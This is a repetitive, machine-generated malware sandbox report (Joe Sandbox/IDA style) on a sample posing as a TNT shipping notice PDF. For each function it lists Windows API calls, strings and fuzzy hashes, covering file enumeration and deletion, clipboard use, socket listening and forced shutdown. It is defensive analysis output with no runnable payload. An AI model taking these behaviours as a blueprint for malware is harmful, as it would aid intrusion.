Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: f55573cd1dd42f949f5cb82fc2dfc6619cf27da78a5d34b60a4f8ad0e1c29583
Instruction ID: 3ccaf47f1b611cf3e662b096460cffbc7d84b69fc1e9e58ee52766979db1c1f6
Opcode Fuzzy Hash: f55573cd1dd42f949f5cb82fc2dfc6619cf27da78a5d34b60a4f8ad0e1c29583
Instruction Fuzzy Hash: C3618874208302AFD301EF25D899F6AB7B8FB84704F14455DF4A6972E2DB31D905DB62

Function 0093698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009369BE
FindClose.KERNEL32(00000000), ref: 00936A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00936A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00936A75

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00936AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00936ADF

Strings

%02d, xrefs: 00936C00, 00936C0A, 00936C5A, 00936CAA, 00936CFA, 00936D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00936B32
%4d, xrefs: 00936BB1
%4d%02d%02d%02d%02d%02d, xrefs: 00936B6A
%03d, xrefs: 00936DA2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 16139f8e8fc18ca0dfc386bcb15fdc89958fa576d33920a31d69a5dd00e5fe13
Instruction ID: 0c90a5fe91b40e995e14ff8fa4df7b60b7a0971726b17dc98c56a4076e7f7fc5
Opcode Fuzzy Hash: 16139f8e8fc18ca0dfc386bcb15fdc89958fa576d33920a31d69a5dd00e5fe13
Instruction Fuzzy Hash: 14D12C72508340AEC714EBA4C885EABB7FCFB88704F44491DF595D6291EB74DA48CB63

Function 00939642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00939663
GetFileAttributesW.KERNEL32(?), ref: 009396A1
SetFileAttributesW.KERNEL32(?,?), ref: 009396BB
FindNextFileW.KERNEL32(00000000,?), ref: 009396D3
FindClose.KERNEL32(00000000), ref: 009396DE
FindFirstFileW.KERNEL32(*.*,?), ref: 009396FA
SetCurrentDirectoryW.KERNEL32(?), ref: 0093974A
SetCurrentDirectoryW.KERNEL32(00986B7C), ref: 00939768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00939772
FindClose.KERNEL32(00000000), ref: 0093977F
FindClose.KERNEL32(00000000), ref: 0093978F

Strings

*.*, xrefs: 009396F5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: dd781648ae6f21d6c151d78a5fc8fc0d9aa702c554f11972ce2d4ffb4c214872
Instruction ID: 08e1b4755326176c8e2214c3a6a35879b07582b8525035ee92ba2c92295370c1
Opcode Fuzzy Hash: dd781648ae6f21d6c151d78a5fc8fc0d9aa702c554f11972ce2d4ffb4c214872
Instruction Fuzzy Hash: 8431FF7260530A6EDB10AFB5DC09BDE33ACAF49325F004055E816E21A0EBB4DE408F10

Function 0093979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 009397BE
FindNextFileW.KERNEL32(00000000,?), ref: 00939819
FindClose.KERNEL32(00000000), ref: 00939824
FindFirstFileW.KERNEL32(*.*,?), ref: 00939840
SetCurrentDirectoryW.KERNEL32(?), ref: 00939890
SetCurrentDirectoryW.KERNEL32(00986B7C), ref: 009398AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009398B8
FindClose.KERNEL32(00000000), ref: 009398C5
FindClose.KERNEL32(00000000), ref: 009398D5

Part of subcall function 0092DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0092DB00

Strings

*.*, xrefs: 0093983B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: ce62733668964396549f43a81e24f02e08c7dfbbf9816c2aebd63d502dfb9313
Instruction ID: f096d882ae01d5f6f80c405dc90e828f7d233a3325cc191be9808c4675b5b4c1
Opcode Fuzzy Hash: ce62733668964396549f43a81e24f02e08c7dfbbf9816c2aebd63d502dfb9313
Instruction Fuzzy Hash: 4F31B27250431A6EDB10EFA9EC48BDE77ACAF86329F104155E955E21A0DBB0DD44CF20

Function 00938195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00938257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00938267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00938273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00938310
SetCurrentDirectoryW.KERNEL32(?), ref: 00938324
SetCurrentDirectoryW.KERNEL32(?), ref: 00938356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0093838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00938395

Strings

*.*, xrefs: 0093839B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 5b4c6c472fe3b5af24d1e4666e8d69f57fbf40b3a685531a281f7e010281de06
Instruction ID: a9776b530599763fa91344ad12f183f2c6996ed984ae47886bb49dea214ba0d4
Opcode Fuzzy Hash: 5b4c6c472fe3b5af24d1e4666e8d69f57fbf40b3a685531a281f7e010281de06
Instruction Fuzzy Hash: 5A6124B25083459FCB10EB64C841AAFB3E8FF89314F04892EF999C7251DB35E9458F92

Function 0092D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C3A97,?,?,008C2E7F,?,?,?,00000000), ref: 008C3AC2

Part of subcall function 0092E199: GetFileAttributesW.KERNEL32(?,0092CF95), ref: 0092E19A

FindFirstFileW.KERNEL32(?,?), ref: 0092D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0092D1DD
MoveFileW.KERNEL32(?,?), ref: 0092D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0092D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0092D237

Part of subcall function 0092D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0092D21C,?,?), ref: 0092D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0092D253
FindClose.KERNEL32(00000000), ref: 0092D264

Strings

\*.*, xrefs: 0092D0CD, 0092D0D6, 0092D0EB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: edae3eb67799849dea91c5a4f9759ea8fae1527d5800979d77993a4b737dc30e
Instruction ID: 186e59e8bea5b1055f1e17b8e324a6dd28de593740b4be5f36e78e32a0f57151
Opcode Fuzzy Hash: edae3eb67799849dea91c5a4f9759ea8fae1527d5800979d77993a4b737dc30e
Instruction Fuzzy Hash: BA618E3180621D9ECF05EBA4E992EEDB779FF55300F208169E411B7196EB30AF09CB61

Function 0093ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0093ED91
EmptyClipboard.USER32 ref: 0093ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0093EDAC
CloseClipboard.USER32 ref: 0093EEA3

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 9ed112d727c8701c49ff016535305951d8007453b53a86036389f954f3d7040f
Instruction ID: c6150bada89eff9ce338f503997735c91f471e45ff29717738ba3318c99291d9
Opcode Fuzzy Hash: 9ed112d727c8701c49ff016535305951d8007453b53a86036389f954f3d7040f
Instruction Fuzzy Hash: DE418E752186119FE320DF19D848F19BBA5FF44319F14C099E4298B6A2C775ED42CF91

Function 0092E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092170D
Part of subcall function 009216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092173A
Part of subcall function 009216C3: GetLastError.KERNEL32 ref: 0092174A

ExitWindowsEx.USER32(?,00000000), ref: 0092E932

Strings

@, xrefs: 0092E925
, xrefs: 0092E920
, xrefs: 0092E95C
SeShutdownPrivilege, xrefs: 0092E902

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ebb13d50e757395f681b9d6282040ab3f0fa7a017b04ee53e63a4c117483f5f0
Instruction ID: bce0f8149ddf7fc1ba43259cc2b5245b535f230f58f5a85d4696c2cce8cba1b3
Opcode Fuzzy Hash: ebb13d50e757395f681b9d6282040ab3f0fa7a017b04ee53e63a4c117483f5f0
Instruction Fuzzy Hash: D0012676620330AFEB1422B5BCCABBF725C9714781F150823F802E21D5D5A55CC08290

Function 00941204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00941276
WSAGetLastError.WSOCK32 ref: 00941283
bind.WSOCK32(00000000,?,00000010), ref: 009412BA
WSAGetLastError.WSOCK32 ref: 009412C5
closesocket.WSOCK32(00000000), ref: 009412F4
listen.WSOCK32(00000000,00000005), ref: 00941303
WSAGetLastError.WSOCK32 ref: 0094130D
closesocket.WSOCK32(00000000), ref: 0094133C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 5520b86b212cef1ccf1b2503ac02e71e3f9f13d187b1dd91aeb56f8972d3ea6f
Instruction ID: 31ec29d9131decf26f375d5b73aa59ebb38ba14824d229f3bced164304888550
Opcode Fuzzy Hash: 5520b86b212cef1ccf1b2503ac02e71e3f9f13d187b1dd91aeb56f8972d3ea6f
Instruction Fuzzy Hash: 9B415E716002009FD714DF68C489F2ABBE5FF46318F188198E9669F396C771ED81CBA1

Function 008FB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008FB9D4
_free.LIBCMT ref: 008FB9F8
_free.LIBCMT ref: 008FBB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00963700), ref: 008FBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0099121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008FBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00991270,000000FF,?,0000003F,00000000,?), ref: 008FBC36
_free.LIBCMT ref: 008FBD4B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: add1a02076a37b0e9393c9e68508ef2bcf5a440e4a0be2fc39650e1fe2e6f1d4
Instruction ID: d5d06da2d52d5cc7ba6f0fe7bf35987b1676639d88092691326978134d23cec3
Opcode Fuzzy Hash: add1a02076a37b0e9393c9e68508ef2bcf5a440e4a0be2fc39650e1fe2e6f1d4
Instruction Fuzzy Hash: 53C11571A0420DAFCB20AF7DDC41BBEBBA8FF41360F1441AAE694D7251EB308E418751

Function 0092D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C3A97,?,?,008C2E7F,?,?,?,00000000), ref: 008C3AC2

Part of subcall function 0092E199: GetFileAttributesW.KERNEL32(?,0092CF95), ref: 0092E19A

FindFirstFileW.KERNEL32(?,?), ref: 0092D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0092D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0092D481
FindClose.KERNEL32(00000000), ref: 0092D498
FindClose.KERNEL32(00000000), ref: 0092D4A1

Strings

\*.*, xrefs: 0092D3F2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 84a0de36964c1d0120d1f13825ad80bbdd9bc7aa57da3ea4267ba2b975b18a48
Instruction ID: 2866a914494d1fd5d5bbc49008159db06662a86298dc536389699531bfca0860
Opcode Fuzzy Hash: 84a0de36964c1d0120d1f13825ad80bbdd9bc7aa57da3ea4267ba2b975b18a48
Instruction Fuzzy Hash: D2315E710193559FC204EF64D895DAF77B8FE95304F444A2DF4E1931A1EB30EA099763

Function 008FE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 008FE645

Strings

1#QNAN, xrefs: 008FF84B
1#SNAN, xrefs: 008FF844
1#INF, xrefs: 008FF852
1#IND, xrefs: 008FF83D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 9db7f4f0a9522e3a88c9e55e075c458a299b987651a64947714600f38d80a897
Instruction ID: 5d8b7cde0da87041a1da65fbd91a2ffd9ca364167e83526d57bca12e919eb8df
Opcode Fuzzy Hash: 9db7f4f0a9522e3a88c9e55e075c458a299b987651a64947714600f38d80a897
Instruction Fuzzy Hash: F3C21771E0862C8FDB25CE289D407EAB7B5FB89305F1441EADA4DE7251E774AE818F40

Function 0093648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009364DC
CoInitialize.OLE32(00000000), ref: 00936639
CoCreateInstance.OLE32(0095FCF8,00000000,00000001,0095FB68,?), ref: 00936650
CoUninitialize.OLE32 ref: 009368D4

Strings

.lnk, xrefs: 009364BA, 00936524, 009365E0

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: fceca9eca0d709d27be0ab364e8f26595b9d8e87294105d52c64370efeae7d77
Instruction ID: 1d1bf18472e8c94bd80baa8de0e8a22a150f32802d76005171410b3ae2fa08e1
Opcode Fuzzy Hash: fceca9eca0d709d27be0ab364e8f26595b9d8e87294105d52c64370efeae7d77
Instruction Fuzzy Hash: 46D11871518201AFC314EF28C881E6BB7E9FF99704F10896DF595CB291EB71E905CB92

Function 009422DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009422E8

Part of subcall function 0093E4EC: GetWindowRect.USER32(?,?), ref: 0093E504

GetDesktopWindow.USER32 ref: 00942312
GetWindowRect.USER32(00000000), ref: 00942319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00942355
GetCursorPos.USER32(?), ref: 00942381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009423DF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 2f91ea5aecc7682a079f2f575c39314cb07786f6e3b542d5e4e829ea67afea83
Instruction ID: 70684e018696039c1c8ef2d7f896cd4dfd6d15b939ca19c546636b7b010bd544
Opcode Fuzzy Hash: 2f91ea5aecc7682a079f2f575c39314cb07786f6e3b542d5e4e829ea67afea83
Instruction Fuzzy Hash: 8B31FCB2108315AFC720DF55D848F9BBBA9FFC8714F400A1AF88497181DB34EA08CB92

Function 00939B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008C9CB3: _wcslen.LIBCMT ref: 008C9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00939B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00939C8B

Part of subcall function 00933874: GetInputState.USER32 ref: 009338CB
Part of subcall function 00933874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00933966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00939BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00939C75

Strings

*.*, xrefs: 00939B5D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: ab9b120fd6bfb952b1baa1f1b4fccb1485cf140012e6d89e89d5fa9d4567fb4f
Instruction ID: c2a483b34a29ecb15b56357e0d77733aa813fd499eef0ba46cb9b30270440aae
Opcode Fuzzy Hash: ab9b120fd6bfb952b1baa1f1b4fccb1485cf140012e6d89e89d5fa9d4567fb4f
Instruction Fuzzy Hash: F041717190420A9FCF14DF68D889BEEBBB8FF05315F144159E849A2291EB70DE84CF61

Function 008D997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 008D9A4E
GetSysColor.USER32(0000000F), ref: 008D9B23
SetBkColor.GDI32(?,00000000), ref: 008D9B36

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 8b6430db5b364ca36d18a6432c9816dc4a7f5d0456ffacd1df135eae459f2f4c
